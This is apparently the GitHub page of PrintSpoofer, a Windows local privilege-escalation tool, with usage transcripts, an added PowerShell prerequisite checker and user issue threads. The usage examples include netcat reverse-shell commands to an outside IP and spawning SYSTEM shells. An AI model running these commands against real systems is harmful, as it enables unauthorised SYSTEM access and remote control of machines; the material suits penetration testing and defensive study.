PrintSpoofer

From LOCAL/NETWORK SERVICE to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 and Server 2016/2019.

For more information: https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/.

Usage

You can check the help message using the -h option.

C:\TOOLS>PrintSpoofer.exe -h

PrintSpoofer v0.1 (by @itm4n)

  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()

Arguments:
  -c <CMD>    Execute the command *CMD*
  -i          Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h          That's me :)

Examples:
  - Run PowerShell as SYSTEM in the current console
      PrintSpoofer.exe -i -c powershell.exe
  - Spawn a SYSTEM command prompt on the desktop of the session 1
      PrintSpoofer.exe -d 1 -c cmd.exe
  - Get a SYSTEM reverse shell
      PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"

Usage 1: Spawn a SYSTEM process and interact with it

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

C:\TOOLS>PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Usage 2: Spawn a SYSTEM process and exit

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

Create a reverse shell:

C:\TOOLS>PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

Netcat listener:

C:\TOOLS>nc.exe -l -p 1337
Microsoft Windows [Version 10.0.19613.1000]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

Usage 3: Spawn a SYSTEM process on a desktop

If you are logged on locally or via RDP (including VDI), you can spawn a SYSTEM command prompt on your desktop. First, check your session ID with the command qwinsta and then specify this value with the option -d.

Use case: Terminal Session (RDP), VDI

C:\TOOLS>qwinsta
 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
 services                                    0  Disc
 console           Administrator             1  Active
>rdp-tcp#3         lab-user                  3  Active
 rdp-tcp                                 65536  Listen

C:\TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep bypass"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
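The three usages above share the same prerequisites, and the issues further down on this page are almost all prerequisite failures (a corrupted binary, an unsupported OS, a timeout). The following pre-flight check is an added example written for this page, not code from the PrintSpoofer project: run it in the shell you intend to launch the tool from and it reports whether the token holds SeImpersonatePrivilege, whether the Print Spooler is running, whether the OS build is in the README's stated scope, whether the PE image is intact and of a bitness that can run on this machine, its SHA256, and the session ID to pass to -d. The path C:\TOOLS\PrintSpoofer.exe is taken from the transcripts above and the function name Test-PrintSpooferPrereqs is the example's own.

```powershell
# Added pre-flight check for PrintSpoofer (example code, not part of the project).
# Every check maps to a prerequisite named in the README or to a failure mode
# reported in the issues. The binary path is an assumption.
function Test-PrintSpooferPrereqs {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$BinaryPath)

    $r = [ordered]@{}

    # 1. The current token must hold SeImpersonatePrivilege (README: "provided
    #    that the current user has the SeImpersonate privilege"). whoami /priv
    #    lists the privilege whether it is Enabled or Disabled; the name column
    #    is not localized, so match on it rather than on the description.
    $privLine = whoami /priv | Where-Object { $_ -match '^SeImpersonatePrivilege\s' }
    $r.SeImpersonatePrivilege = [bool]$privLine
    $r.SeImpersonateState = if ($privLine) { ($privLine.Trim() -split '\s+')[-1] } else { 'absent' }

    # 2. The Print Spooler must be running: the tool makes an RPC call to spoolss
    #    and waits for the spooler to connect back to its named pipe. With the
    #    service stopped there is nothing to answer that call.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $r.SpoolerRunning = [bool]($spooler -and $spooler.Status -eq 'Running')

    # 3. Stated scope is Windows 10 / Server 2016 / Server 2019 (NT 10.0, build
    #    10240 and later). Server 2012 R2 (6.3.9600) is outside it.
    $cv = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $r.OsBuild = [int]$cv.CurrentBuildNumber
    $r.OsInScope = ($r.OsBuild -ge 10240)

    # 4. Integrity of the image. An ASCII-mode FTP transfer rewrites 0x0A/0x0D
    #    bytes inside the file, and Windows then refuses it as "not compatible
    #    with the version of Windows you're running". Check the MZ and PE
    #    signatures and record the SHA256 to compare with the build machine.
    $full  = (Resolve-Path -LiteralPath $BinaryPath).Path
    $bytes = [System.IO.File]::ReadAllBytes($full)
    $isMz  = ($bytes.Length -gt 0x40 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
    $peOff = if ($isMz) { [BitConverter]::ToInt32($bytes, 0x3C) } else { -1 }
    $isPe  = ($isMz -and $peOff -gt 0 -and ($peOff + 6) -lt $bytes.Length -and
              $bytes[$peOff] -eq 0x50 -and $bytes[$peOff + 1] -eq 0x45 -and
              $bytes[$peOff + 2] -eq 0 -and $bytes[$peOff + 3] -eq 0)
    $r.PeHeaderIntact = $isPe
    $r.Sha256 = (Get-FileHash -LiteralPath $full -Algorithm SHA256).Hash

    # 5. Bitness. IMAGE_FILE_HEADER.Machine directly follows the "PE\0\0"
    #    signature: 0x8664 = x64, 0x014C = x86. An x64 image cannot run on
    #    32-bit Windows; an x86 image runs on both.
    $machine = if ($isPe) { [BitConverter]::ToUInt16($bytes, $peOff + 4) } else { 0 }
    $r.ImageArch = switch ($machine) { 0x8664 { 'x64' } 0x014C { 'x86' } default { 'unknown' } }
    $r.OsIs64Bit = [Environment]::Is64BitOperatingSystem
    $r.ImageRunsHere = ($r.ImageArch -eq 'x86') -or ($r.ImageArch -eq 'x64' -and $r.OsIs64Bit)

    # 6. Session ID for -d (Usage 3): the same number qwinsta shows for the
    #    current session, obtained without parsing qwinsta's output.
    $r.SessionId = (Get-Process -Id $PID).SessionId

    [pscustomobject]$r
}

$check = Test-PrintSpooferPrereqs -BinaryPath 'C:\TOOLS\PrintSpoofer.exe'
$check | Format-List

if ($check.SeImpersonatePrivilege -and $check.SpoolerRunning -and $check.OsInScope -and
    $check.PeHeaderIntact -and $check.ImageRunsHere) {
    "Prerequisites met. Example: C:\TOOLS\PrintSpoofer.exe -d $($check.SessionId) -c cmd.exe"
} else {
    "One or more prerequisites failed; review the list above before running the tool."
}
```

Compare the reported SHA256 with the hash taken on the machine you built or downloaded the binary on: a mismatch with PeHeaderIntact set to False is the transfer-corruption case, not an OS compatibility problem. If SeImpersonatePrivilege is absent from the token, nothing on this page applies and a different primitive is needed.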

printspoofer's People

Contributors

itm4n


printspoofer's Issues

printspoofer dll

When I compile it as a DLL and load it from another program, it won't work. The RpcOpenPrinter call throws an exception, no idea why, but the executable works like a charm in the same environment.

No output returned from program on windows server 2019

I compiled the source using Visual Studio 2019 with the Release configuration. When I start the program on the machine I compiled it on, I get the expected output:

PS C:\Users\root\Desktop\av_excluded> Get-FileHash .\PrintSpoofer.exe

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          F0698E35BB277C471E1DAFDBE6777AFA504CDCB313E0774E4E854C4A556087C6       C:\Users\root\Desktop\av_excl...

PS C:\Users\root\Desktop\av_excluded> .\PrintSpoofer.exe
[-] Please specify a command to execute
PS C:\Users\root\Desktop\av_excluded>

However, when I move the binary to a windows server 2019 and execute it, I get no output:

PS C:\> Get-FileHash .\PrintSpoofer.exe

Algorithm       Hash                                                                   Path
---------       ----                                                                   ----
SHA256          F0698E35BB277C471E1DAFDBE6777AFA504CDCB313E0774E4E854C4A556087C6       C:\PrintSpoofer.exe


PS C:\> .\PrintSpoofer.exe
PS C:\> 

This might be useful

PS C:\> systeminfo

Host Name:                 SRV1
OS Name:                   Microsoft Windows Server 2019 Datacenter Evaluation
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          NA
Registered Organization:   vm.net
Product ID:                00430-00000-00000-AA992
Original Install Date:     10/13/2020, 3:57:22 PM
System Boot Time:          10/15/2020, 11:34:03 AM
System Manufacturer:       Microsoft Corporation
System Model:              Virtual Machine
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 44 Stepping 2 GenuineIntel ~2527 Mhz
BIOS Version:              Microsoft Corporation Hyper-V UEFI Release v4.0, 1/30/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume3
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+01:00) Belgrade, Bratislava, Budapest, Ljubljana, Prague
Total Physical Memory:     2,047 MB
Available Physical Memory: 692 MB
Virtual Memory: Max Size:  3,199 MB
Virtual Memory: Available: 1,789 MB
Virtual Memory: In Use:    1,410 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    testdomain.local
Logon Server:              \\DC1
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB4514366
                           [02]: KB4512577
                           [03]: KB4512578
Network Card(s):           1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.1.69
                                 [02]: fe80::e1a2:6227:336f:5443
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

File is not compatible

The last privilege escalation for this room uses the command: PrintSpoofer.exe -i -c cmd
Error: This version of c:\inetpub\wwwroot\t4wrksv\PrintSpoofer.exe is not compatible with the version of Windows you are running. Check your computer's system information, and then contact the software publisher.
help me

Some test results

Hey! Just my 2 cents based on testing:

C:\Users\<><><>\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

C:\Users\<><><>\Desktop>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[-] Operation failed or timed out.

Systeminfo:

OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18363 N/A Build 18363

SOLVED: Not compatible with Microsoft Windows Server 2012 R2 Standard

SOLVED: Issue solved; the error was caused by a discrepancy in FTP transfer mode between ASCII and binary.

I was trying to hack a box running Windows Server 2012 R2 when it gave the error below. I tried both versions just to be on the safe side.

c:\inetpub\wwwroot>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
This version of c:\inetpub\wwwroot\PrintSpoofer64.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

c:\inetpub\wwwroot>PrintSpoofer32.exe -i -c cmd
PrintSpoofer32.exe -i -c cmd
This version of c:\inetpub\wwwroot\PrintSpoofer32.exe is not compatible with the version of Windows you're running. Check your computer's system information and then contact the software publisher.

systeminfo for the target OS goes as follows:

OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User

System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC

Total Physical Memory: 4,095 MB
Available Physical Memory: 790 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 1,356 MB
Virtual Memory: In Use: 3,443 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP

Why use `CreateProcessAsUser` instead of `CreateProcessWithToken`?

Hi Clément, I have an issue after reading the code:

if (!CreateProcessAsUser(hSystemTokenDup, NULL, g_pwszCommandLine, NULL, NULL, g_bInteractWithConsole, dwCreationFlags, lpEnvironment, pwszCurrentDirectory, &si, &pi))

Why not use CreateProcessWithToken? In my testing, LocalSystem logs in as hostname$ in a DOMAIN environment, and the hostname$ account doesn't have SeAssignPrimaryTokenPrivilege.
